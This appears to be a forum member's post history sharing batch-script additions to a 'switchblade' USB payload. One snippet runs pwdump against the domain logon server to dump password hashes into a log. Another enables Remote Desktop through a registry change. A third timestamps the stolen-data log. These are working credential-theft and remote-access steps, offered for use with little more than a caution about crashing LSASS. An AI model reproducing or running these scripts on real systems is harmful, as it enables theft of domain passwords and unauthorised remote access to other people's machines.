Jump to content

msoule

Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by msoule

  1. Here's another little mod. Not too glamorous but handy. This will check to see if the user is logged on to a domain server. If so, pwdump will run against the logonserver and dump the PWs from there. This will ONLY work if the logged on user has DomainAdmin rights. If the user does not have these right the attempt will fail and WILL generate an event in the Security Log of the server. Also, I recommend using PWDump6 to avoid LSASS errors on the server. I have had LSASS crashes in my lab with previous PWDump versions but never with v6. Use with care. @echo ==================================================[Dump Server SAM] >> Documentslogfiles%computername%_load.log 2>&1 @if not %LOGONSERVER%==%COMPUTERNAME% .pwdump %LOGONSERVER% >> Documentslogfiles%computername%_load.log 2>&1 @if %LOGONSERVER%==%COMPUTERNAME% @echo Logged on to local machine. Process skipped. >> Documentslogfiles%computername%_load.log 2>&1 @echo ==================================================[Dump END Server SAM] >> Documentslogfiles%computername%_load.log 2>&1
  2. A few of you may find this handy. I made this little routine for the end of my batch file. It time and date stamps the log file. I had to tinker around with a few other aspects of the original go.cmd file in order to get it to work right. If you have issues let me know and I'll post my whole bat. if not exist documentslogfilestemp md documentslogfilestemp move Documentslogfiles%computername%_load.log Documentslogfilestemp FOR /F "usebackq tokens=1" %%n IN (`dir Documentslogfilestemp /b`) DO @FOR /F "usebackq tokens=2,3,4 delims=/ " %%d IN (`date /t`) DO @FOR /F "usebackq tokens=1,2 delims=: " %%t IN (`time /t`) DO @ren Documentslogfilestemp%%n %computername%-%%d%%e%%f-%%t%%u.log move Documentslogfilestemp* Documentslogfiles rd Documentslogfilestemp
  3. I did this to my switchblade too. The following line makes the needed registry change and will be reflected in the checkbox. @reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f >> Documentslogfiles%computername%_load.log 2>&1
×
×
  • Create New...